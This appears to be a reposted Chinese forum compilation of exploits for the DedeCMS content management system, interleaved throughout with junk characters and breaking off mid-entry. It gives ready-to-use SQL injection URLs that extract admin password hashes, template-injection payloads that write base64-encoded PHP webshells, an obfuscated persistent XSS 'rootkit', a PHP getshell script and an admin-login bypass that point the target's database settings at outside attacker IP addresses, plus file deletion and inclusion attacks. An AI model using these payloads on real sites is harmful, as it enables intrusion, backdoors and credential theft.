|
|
/ X% O, D. S; ?' C1 c
Dedecms 5.6 rss注入漏洞8 ?2 r: X4 G: e3 Y8 |% P$ F
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1' C2 b8 E$ s* U- j
% F8 z$ J) ]: N# N9 U
; Z- ?. P: {+ Z% z$ U1 K, |. ]4 m0 A! x$ c9 j' w1 I9 t
' }' H2 ~9 ?5 a/ C; V1 U- O
+ k/ h* X' s$ s, J) M
w* C/ N) T, i- G; j$ H% Z9 {+ i& W# _
) h3 Q2 H8 m+ h- X' G" x2 L y) MDedeCms v5.6 嵌入恶意代码执行漏洞- D5 j, P# W4 r, l+ R
注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}9 f, _0 \2 j- ~3 w% p
发表后查看或修改即可执行2 E: o9 c$ J( J- K6 Z3 ~% X
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}+ Y# C! _; S2 a2 X* u( a" v
生成x.php 密码xiao,直接生成一句话。
7 o& f+ z$ B0 R* }( n2 X
D% R0 N# Z5 l" C
N- b/ w1 e; q# V5 o1 |) k: {8 e2 C" O1 E
# j5 {+ h! c' h" K+ W( A7 o, l0 S+ Y. D' A% ^$ R6 i& _2 j0 n: f9 B
6 m1 o9 M0 k! u4 E9 \; h4 O; o* f! W- I. Z
( z$ J. ?5 a" U
Dede 5.6 GBK SQL注入漏洞3 C/ |, p; P8 a3 w8 S" m) ?
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
# P4 ]5 z6 z0 [http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe8 d2 u, _: F8 F, U+ _
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7+ b. s+ R) b+ Z! N
* {+ J6 ?& K( j; }
$ x9 A' \& v0 i- @) r; i& Y4 h% u/ b$ _& s9 m( G+ T
6 n1 ?7 S: p1 X1 }( l7 S
* c5 ?/ J2 K( @1 L
! A' b" `4 o2 \( J) S& @* M+ `& n4 _0 \& C/ T
- i) k" K: F- s3 T) sDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞$ i# \( P' w+ }* U; J% R# x3 n
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` & O* \" e( \/ u% l
* a0 D* m) n0 s' m/ r" H
5 w8 H2 b8 D2 [* _3 \
$ m# x8 d7 f. Q
6 u$ i; [- Z* E y7 ^( `
$ q! V! z# x' H+ h7 D
+ k$ {4 ^! s. p1 Y& [, l, TDEDECMS 全版本 gotopage变量XSS漏洞
; T6 q: D" t: \! b( z" u+ L% G1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。
$ V3 \/ N% h0 D7 {http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
8 p' {5 t% ]- y$ |# S8 p
: o0 d! J/ n7 T' o& r" G2 S/ a" j k3 Z$ i# s
2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。
$ }- [& H( J# o4 {6 |http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda# r( o+ D: N0 z
: v! f# s; e5 }
0 x+ m" q+ K1 p5 [' v
http://v57.demo.dedecms.com/dede/login.php
) n% y4 X! K( _# N
+ l2 t& _+ @5 g) _7 g
3 z- k+ N/ B0 o/ r& _" ]7 ?% rcolor=Red]DeDeCMS(织梦)变量覆盖getshell
) X1 B, j- {/ ^8 F% G#!usr/bin/php -w
; H8 c- w9 G* E- u<?php
& }+ J) A8 m) n! \; K4 Lerror_reporting(E_ERROR);
* x6 c% u/ N, y& Lset_time_limit(0);
! V: D: }! G' C/ N' _4 z+ @print_r('
! i0 R! v5 z7 ^; eDEDEcms Variable Coverage
% u, x1 I5 o* k: R) HExploit Author: www.heixiaozi.comwww.webvul.com
' }6 c( @* X y);
1 N$ l& L& `2 Y+ }echo "\r\n";- h0 z+ G \9 d! p! c/ B
if($argv[2]==null){2 t9 N$ x8 O4 A7 }0 l& V
print_r('3 S2 p0 r7 y4 C- N
+---------------------------------------------------------------------------+
3 W1 `3 a$ i n3 fUsage: php '.$argv[0].' url aid path& c; r% s( v2 s' Q) n W
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
! c/ v/ h. ]7 D: \Example:) Y5 `: W$ T, A
php '.$argv[0].' www.site.com 1 old
" F* |$ b9 t7 z0 Y+---------------------------------------------------------------------------+& Q. J- }4 Y2 t# x( K# W
');
: i+ X% r7 Y! Y" N( ^exit;# q; V8 O5 H& i' b3 c
}: B: s7 f8 ] c( u& g' ~
$url=$argv[1];, `7 [3 S9 t/ D" E8 X% k# Z; [* `* K
$aid=$argv[2];
]( |. V) K7 I( _3 J j# E1 l$path=$argv[3];
' w& |, q* Z: O7 ^8 Q0 ~8 h( e8 t$exp=Getshell($url,$aid,$path);
- H" C: i: B5 I9 U+ F2 Bif (strpos($exp,"OK")>12){
8 i3 O# ], r1 pecho "7 q% ^% s) ?5 m
Exploit Success \n";
/ G4 {2 W6 F3 `4 `" yif($aid==1)echo "0 B, q+ T% e. A f O8 L: s
Shell:".$url."/$path/data/cache/fuck.php\n" ;" o. P J# [* u& B |: I
' d' K6 M/ y1 M3 j# u! f1 l2 ?3 F/ c' [1 H, q
if($aid==2)echo "
- n. m; j" w }* A! Z. q {6 @8 B1 S; VShell:".$url."/$path/fuck.php\n" ;
" U% F+ Q8 P3 _" q9 h2 Z6 q# G
2 m( Q* R1 Z; B, {+ E' l; j- I+ U) y
if($aid==3)echo "
/ }' \, V& B5 m- `Shell:".$url."/$path/plus/fuck.php\n";
, u. X7 V3 Z4 [! N. F$ c5 d( U5 T/ q1 B
9 Y& ~9 }) G9 Z5 [1 C2 G}else{( X# l8 F. q6 v. p
echo "
! _( e! G+ T6 X6 s) |Exploit Failed \n";1 |2 y9 p f2 f; ?
}! _: r( ~4 X, D$ P# {* M+ h
function Getshell($url,$aid,$path){
7 m: J7 |/ o# D& @2 R$id=$aid;
; K6 \3 b) X1 `, f3 f+ T! D$host=$url;
& q! |- @& U1 {8 z$port="80";
1 N1 ]: P5 E* }+ V$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
: L0 {6 ^7 ?0 F" N: J9 y" m, }$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
6 ^9 f3 [% g6 p4 Q% n# S4 C$data .= "Host: ".$host."\r\n";
}2 `' F% u1 }, k# i$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";% @6 E* F8 K6 p @% G# o
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";" |- J$ Z/ x% J
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
$ Y9 u/ z$ F* m* ~5 B2 D/ I1 \% m" \//$data .= "Accept-Encoding: gzip,deflate\r\n";0 q! k- P, T" K' V2 X! s2 @
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";; V- ?% C8 @. V# L
$data .= "Connection: keep-alive\r\n";
& H0 {3 Q" {3 i( v8 x" I$ j$ o$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
0 A, `* O2 M0 g: _) a7 r+ U$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
; Y1 z1 b% ^% x; }$data .= $content."\r\n";
% e! }3 ^# t$ q; _" `0 H$ock=fsockopen($host,$port);
9 S, }5 ]% s, s4 t2 I2 vif (!$ock) {" z( S; E2 Q/ G
echo "! @% m, @ S: o& B- K1 ]
No response from ".$host."\n";
- E# P5 ?. ]+ n9 u$ |. f}" I- N4 F( r6 C0 h( w
fwrite($ock,$data);% Y8 `- n' X, L, _
while (!feof($ock)) {
0 @8 o0 t, a- P+ | G, C$exp=fgets($ock, 1024);( z1 K1 Z* r/ o( H
return $exp;9 w& D3 [9 {' P0 ?3 S2 A- B- \+ \
}1 \* F/ k. @: M3 }& U
}
1 |. ]- F2 Z! D1 e* K5 g
/ |7 r+ y5 s- a7 J+ H" v. Y4 y* B
+ I2 K% {# W$ j8 X9 N3 X?>7 j d1 Q7 r- b8 s& E
) P- s1 B" p# U
, v! `& m5 M9 y, @; ~; \
. f$ {( n, V0 D- M6 {! x% `9 _: e0 B: B, J, z0 S& {+ a
, B6 J# L, _5 X0 K; t
5 y2 D3 Q1 T u8 @
# s& i2 S" W1 k" |& O. e$ @
y0 |2 e5 P7 E2 ?, C3 i/ E- ^
* n2 Z+ v$ k( \( |# B' M- c
, W% J5 s! b, q3 k; ?! D/ pDedeCms v5.6-5.7 越权访问漏洞(直接进入后台); p! z0 }; m; J8 a3 Y+ K+ {
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root8 a! G( N% m; H* U( c: m
/ m' C c( w- |
0 u4 x0 M5 f- ?
把上面validate=dcug改为当前的验证码,即可直接进入网站后台
~' `- Q) j# u# \9 M* V
- ^1 d, A; t w; B: P" }
3 q, R3 p, r# s! X. m% X2 `此漏洞的前提是必须得到后台路径才能实现
4 ]7 a) b' s4 n' N( N- J# P( X* Z1 ~# d4 e1 g& @2 y9 _
/ k6 @( R5 u0 N4 [9 b# ~' \1 P
. u& w6 f0 X$ u; Y; Y* e: }$ f* `- l8 g" }' H- A( ~
% N5 t# V9 b7 v# b4 k& Y* k, R* m! i5 Y% R, O
( w9 ~' [# U. F3 D2 P$ y$ W/ Q- l( O( |/ N0 P
' X ?: z% ?! g, i$ p
; ~; @, v& R% E4 |: m3 MDedecms织梦 标签远程文件写入漏洞
; d9 u6 K% p" g- i前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
- b S0 B) \2 o4 V R! s$ p( l) w7 X! @5 d6 ^
9 Y5 @+ G$ X6 x; p& e9 Y& V( d
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。 4 Q0 l% k- p, I% E8 E! _1 v4 [. X6 Q
<form action="" method="post" name="QuickSearch" id="QuickSearch">
- I% P8 V H% n. M, C: u. t<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br /># D3 u* Q. D+ W3 Z4 D5 o
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />" `/ a( F2 R" D
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
8 E/ A k4 d1 K<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
]3 K; v0 s5 E% D<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />) n7 W4 y6 r8 K5 @
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />6 J4 [& T& K+ a3 N. S, i/ N
<input type="text" value="true" name="nocache" style="width:400">
4 _* @4 S% }9 X% ` P1 E6 a$ _! h2 X0 ^<input type="submit" value="提交" name="QuickSearchBtn"><br />
; C- G2 K3 i3 \5 e</form>& G( K3 r. n! i: G/ j! k9 }
<script>
, i; _9 ]5 X3 _function addaction()
9 I0 |: O2 |# w4 L( z4 \3 M{( ]) T8 }8 c: n: p
document.QuickSearch.action=document.QuickSearch.doaction.value; ], E6 R* `7 c5 r$ \
}
! q" v4 ^: d) x' E</script>, Q2 ?- W6 _: A0 T% y5 W" l
& A6 E3 s0 X/ I7 [
5 F$ ^$ J/ u6 }; g# S$ K; L
$ z8 ^0 S Z7 B) |. a: J9 V
0 d( F, j7 `4 c) I, q% K: W7 J" ]% T
6 X5 ]2 L7 [8 X4 S- p9 R
7 U& L( _; N8 ?; ?6 n0 X h+ x
, K% N0 e# e: c7 v( L
' w& f, k" G8 x) M5 [/ T
7 _/ H* g8 x. a' o" dDedeCms v5.6 嵌入恶意代码执行漏洞
; s$ c3 \# S3 `" X8 x, h$ E注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
& S# K/ p6 A0 y+ q9 \% p' ba{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
' m1 U1 ]; @* O2 \4 [: E( R3 l生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得
9 a! i2 i: r2 [' a1 `- `+ w1 B8 SDedecms <= V5.6 Final模板执行漏洞0 X: l: ?: i) \* }
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:/ H: j, r8 a5 C7 V+ G" o8 [
uploads/userup/2/12OMX04-15A.jpg
/ h7 x6 D9 ]9 y$ {" b b' |$ M) y0 \
, f) q% l# A2 Y5 \4 f9 Y
模板内容是(如果限制图片格式,加gif89a):! T( q7 U% L v! |% j# ^7 A' z
{dede:name runphp='yes'}
" N; U0 h9 i$ M8 d! Q3 H$fp = @fopen("1.php", 'a');
; X' A+ V/ a- V X2 s8 J@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
$ Z! G9 q+ w5 S@fclose($fp);& I" F9 E% @$ x3 T
{/dede:name} t. N3 d% q# k7 j% d3 c7 b
2 修改刚刚发表的文章,查看源文件,构造一个表单:/ P/ F; V P; e1 t
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
9 ]0 x2 G: k3 v1 p, G2 q. m' N& T<input type="hidden" name="dopost" value="save" />; D* a; K* u; k) T0 m' o9 @
<input type="hidden" name="aid" value="2" />9 u; d3 H* h7 I; ^
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />+ i* g2 i0 f+ t6 R
<input type="hidden" name="channelid" value="1" />: ]; q1 z& b7 y! M
<input type="hidden" name="oldlitpic" value="" />
9 ~! T2 ~( o! m f; {<input type="hidden" name="sortrank" value="1275972263" />
" X) |9 N) z/ ^. n8 @
) y8 M2 |; B+ S2 c+ U- s0 \* n% C/ s: \8 p$ y5 r
<div id="mainCp">3 c6 h5 V- C- N. o* C( M9 @/ Q
<h3 class="meTitle"><strong>修改文章</strong></h3>
* M! _, N* I6 l3 s* f. u9 x3 V0 M" }9 ]! a
9 o% M2 [; D5 b* V& [" M) ^" o<div class="postForm">
& j/ f, g; ^* D4 l. o$ w" u<label>标题:</label>. U+ V( x4 W1 h- _* y- ~( |
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
4 e% x, P; Z6 \; i1 n0 c
, S6 u& V0 @0 j/ s+ J
6 E7 V* `# D& f; u1 ]. R J<label>标签TAG:</label>
. y7 O3 r8 T4 W% c4 }) I2 F( V. o3 Y, i1 J<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)' t. H' y/ N- i% s) A f
! T* S6 o1 ?! l5 z+ i( }+ o
8 d4 B: V+ C3 f+ [1 \6 e<label>作者:</label>8 p9 P7 C$ c2 y4 J- |. G& K
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
u* X( a0 G. a; O$ U5 T: Z0 G* R2 L" N! i5 T6 @0 u, d$ I4 c
# Q9 B# N- f( {: T" r& V0 Q
<label>隶属栏目:</label>
7 R7 o% b9 |2 u" X4 ^7 v<select name='typeid' size='1'>
& U- i; I" I, D8 k I H3 d<option value='1' class='option3' selected=''>测试栏目</option>7 D4 A( x/ Y) |7 o) O( Z- t
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)5 L* z3 @7 {: m, T
; d1 d" s$ G( U" B5 Q/ ^) S5 V2 g
6 i3 K% u* I9 L6 @5 w( _5 J<label>我的分类:</label>8 b# J: g& A& r3 |% P
<select name='mtypesid' size='1'>3 s/ s9 t' t7 a% t, }
<option value='0' selected>请选择分类...</option>. L& y& d/ s1 X- H- x: C
<option value='1' class='option3' selected>hahahha</option>
# B2 D+ ~/ i% R7 }9 A9 b</select>: E, q1 }! c. R' L9 i& e, ]
! B4 [& \. G5 {% Z" e5 @6 s- a$ D2 C) y! s) c0 |, K
<label>信息摘要:</label>0 U; N. D: Z5 U! m" \% V; |
<textarea name="description" id="description">1111111</textarea>" X6 }9 D" `- Y0 a2 d
(内容的简要说明)
. _- U* j# s% s9 t! A4 d& X# U" J1 L
0 w. i7 b5 ]* l, t
<label>缩略图:</label>, @$ M' ?8 N, r4 l: Q
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>; a8 O* b- a6 g% s I8 M
% m/ j! @1 W9 {, ?' e
6 H0 }6 q) f" A- O+ U9 p<input type='text' name='templet'
! t" D ?1 g; a# hvalue="../ uploads/userup/2/12OMX04-15A.jpg"># a& A2 M& X @4 _% x, h: L6 q
<input type='text' name='dede_addonfields', V4 z5 Q% r7 P! `# O8 a
value="templet,htmltext;">(这里构造)
% |% O+ ~4 L+ B u I3 M$ v+ V</div>
p# w% x; q" g b2 [
- P! b" l: ]; r3 m& ?$ M& i
& I L- }: y# i- T8 }8 V' g |<!-- 表单操作区域 -->2 P3 K- n: _3 N2 U
<h3 class="meTitle">详细内容</h3>! r" ` [8 |; D9 o/ D4 z4 K. `& H
; Y6 }6 w& [$ m- X: \
) b; J( ~3 ]8 n
<div class="contentShow postForm">
" u& }) @! }6 ^: V<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>3 i/ p( ?; O: i+ u/ l0 g
2 \) @% H0 g' V9 ]3 i7 w
% w, F& r; m: ?5 G5 X
<label>验证码:</label>8 F! M/ `1 {$ q8 U' F! W
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />1 O7 {0 j5 I$ W9 s- b
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />/ x: v' ]9 J A1 s1 Q5 |" A
$ p1 I8 @, j# ]
F* v' x; ?; W4 g- q5 V, V<button class="button2" type="submit">提交</button>+ X8 _1 t/ w0 T6 y
<button class="button2 ml10" type="reset">重置</button>* B/ c( i; H& U! S: w$ m
</div>( o, e, R$ Q' p. {( ~! Y$ Z
$ g( |6 A S7 D3 Y, A) p, Q8 o0 }3 |2 Z$ h& w4 h. w
</div>: F Q2 _6 }4 ]7 f% G7 k4 r
" T0 C; M7 y8 i
6 |0 }4 t% @ a( D7 \
</form>
: m. P2 D- L2 Z: p% I/ h3 O, | \5 A4 {( w% ?
! m. @! o9 v3 G; h提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
& F' n( {9 N2 I: ~假设刚刚修改的文章的aid为2,则我们只需要访问:
. A- \! v! F+ Z- J, uhttp://127.0.0.1/dede/plus/view.php?aid=2
9 }) A* P3 ^* \% h; g- a即可以在plus目录下生成webshell:1.php
7 \$ v. _/ u( l V) o5 G+ E
+ K" W8 ?0 |8 n+ M# }/ c: z. z9 T+ M1 X* \9 b
( a, K6 t0 Q2 h* B4 n9 D0 I
{; q& d0 `$ Q) M4 j J# W: H; g% ]3 f+ ^
) ]2 S) Z" I2 `: h& A |6 a
t- R6 E3 |" A& K0 T3 o
$ F9 _% m8 g) V# b( ^' |5 H5 p; z
5 Q. w5 v6 h/ T) R
0 z9 r3 K/ P5 P2 X- o3 w- X2 f5 D1 l9 N" Q8 w+ a' ?4 o$ |* l) J
& f9 U4 \$ r' B) L# c [5 t8 kDEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
/ J+ Z- a0 w$ Q7 tGif89a{dede:field name='toby57' runphp='yes'}
' @. w. L) C X) e: U. {! \phpinfo();
( p# E5 G1 U V: b( `{/dede:field}& `5 X, E$ o/ B0 B( {" |
保存为1.gif
, l& Y# ?6 `% K3 Z4 \4 ?7 V<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
0 {- z% k4 `6 X' F U3 L) \# \8 m- } _<input type="hidden" name="aid" value="7" /> ' K% ^3 V/ M1 P+ R# q9 p2 l
<input type="hidden" name="mediatype" value="1" />
, K( W2 L2 v" G5 ]7 z0 W<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> - V( u/ `/ Y' a# _9 e
<input type="hidden" name="dopost" value="save" />
7 _9 S" I( e2 v8 m, [<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> & V; @. g. i" @$ ~6 B d, i
<input name="addonfile" type="file" id="addonfile"/>
7 x5 {* [$ f' `0 _) e<button class="button2" type="submit" >更改</button>
6 k1 D* }6 i( W</form>
3 S3 C) y: M8 \9 t# I i, `
6 v3 j0 b! [5 ~3 k7 V: `$ d! V& u1 ]2 J- L
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif( b( D- g. c+ ]1 M
发表文章,然后构造修改表单如下:5 e$ w; l* c7 r
/ P1 s, _! X( S$ R/ C. ^5 t F
9 @/ E4 P+ f4 l" {4 I" ^2 _, `' \<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
0 m& T% y* F! ^2 O<input type="hidden" name="dopost" value="save" />
5 o# G* b' n: O<input type="hidden" name="aid" value="2" />
0 m$ f4 Q% S. j3 C4 M<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
0 `; l7 m( \- N8 ~) k7 _, i& C<input type="hidden" name="channelid" value="1" /> 1 r& D1 a6 l& l3 c, K
<input type="hidden" name="oldlitpic" value="" />
8 P% P' D, m' U4 ?, A% p& X7 D<input type="hidden" name="sortrank" value="1282049150" />
: u' @' M9 P$ I# Q<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> ( h# V: M! W! T2 w" ^" Y
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/> 2 O0 m9 W, Q. s+ l
<select name='typeid' size='1'>
7 C; P; k# b- x' x# X<option value='1' class='option3' selected=''>Test</option> # M. Z r2 y. j1 t: A* T2 t
<select name='mtypesid' size='1'>
5 K& e$ R' o6 P. U1 T<option value='0' selected>请选择分类...</option> $ t3 K+ J- Z2 a% x- c
<option value='1' class='option3' selected>aa</option></select>
! Z5 q6 x: ^5 {. U<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
' m: V5 {4 \6 E5 [<input type='hidden' name='dede_addonfields' value="templet">
- q$ O; u& m! I7 k. s5 j7 z<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> 0 k" d8 G2 l5 P* X( X5 f
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
/ X9 j0 S) W& I<button class="button2" type="submit">提交</button> 3 C; u- w2 e$ d4 C7 X+ J
</form>
& Q6 p% x; T/ B3 e. i: S/ V# y' S) {1 v3 y; }! c( i
) [2 u+ v5 @# L9 F( w
) O# n3 `+ r5 O# I3 H# {+ n" a0 O+ a1 i% a4 R+ M% ]2 N) ]; f# [
% I1 P! ?1 A$ @& {! L4 z: z( `2 F
6 t8 C8 F0 t. @. r6 w
- ^6 B: I3 J; X- U* h/ R5 w. R
& {( H% ^& Y( F: c7 T% x/ a% p
+ c2 W+ c. f, f# H2 A h4 |
8 J5 v8 C$ J& E: E3 n. A2 p& ^( ^( W. J5 |0 m
* Z) a/ Z' d: ^8 }* | {' `织梦(Dedecms)V5.6 远程文件删除漏洞
; ?, [+ o# j; Z: vhttp://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
C0 m- W2 R+ ]5 W
8 S0 {9 {0 k) I5 ?* x& P# C6 U8 S5 Y
* P( E4 c* M: Z5 b. Y! i: V
3 i; U: j" H: ]! s
( {2 Y$ U% m4 w2 K$ L7 r" O' [% D
4 l+ m" q, u |8 ]$ ?3 v; c1 ?; t0 c# _# w
1 M$ Z% U) Z) b, g: f- X0 s) u# U1 \% T" Y
* Y) H3 i' R+ o, u5 ?织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞 0 ]0 |( r! q* d2 u
http://www.test.com/plus/carbuya ... urn&code=../../) F" g$ ~" ]+ [& `% p9 ~- r4 b
( H; ?" i" u5 c9 j Y
! h& i1 ^% c9 d# J! L% g. i6 Y8 ^1 i$ s+ W
& H5 M" n7 r, C; c- f9 W4 a
' c2 ]; A& X+ l1 a( V: Q' p$ Z1 C& X: c, O
9 s4 T% @0 e1 J& p; O* r7 Q* ~7 ~7 U* d* l2 O: J6 @2 ^2 Z3 j- {3 n
- |5 Q" i/ B1 i6 }0 \/ s( s. ?9 ^ i4 }' W* S3 v7 D! [# f
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
+ {5 ?- X0 f8 z# Bplus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`0 @# K& e2 Q. |- Z( x8 x
密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5
% [4 ?) m' g& U
& X5 `; r, E- y$ S0 x& V0 M2 R
0 e3 i/ s1 ^" t
t& B3 |) ^) ^) Y
/ o5 m7 q" }# _8 n$ t" d1 w3 ~9 b$ z% `5 z0 K" c8 H' ?. t! o
9 _4 B* ], t: G' ]4 L1 r! c! c
. G, i [8 I6 ?3 N7 n/ K$ ]) F; H0 V9 }) H$ c; U6 R& L( G
3 S7 T( G! m& f! s( o5 t2 s& L, g5 g2 o* }* I- n! v! Z$ X% V# F
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞8 B: D# l. i9 w/ `! h# [3 ?
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''=' k% `* T3 v1 {, ? [7 M* ?% n
! Z# o$ w8 G! G- r. f c7 v4 j* `
5 }6 ~# j9 k7 C/ m1 k8 g& r, ~, h# a ^ t& `5 F0 Z! E
1 {' X) G+ w7 u: c9 k
' L9 X/ w" ?; H+ H1 r4 ` H
2 y, |9 C: }' @% }# B( _$ F( ^& M) b+ u
& u0 Q( ]4 M, k9 i! p8 ^% d
, ?+ m+ m- J0 _6 t
$ R! F* y f8 O" y织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
7 B: H6 X4 `0 I/ Q/ Y<html>. T6 h, Z5 S \7 D2 I
<head>
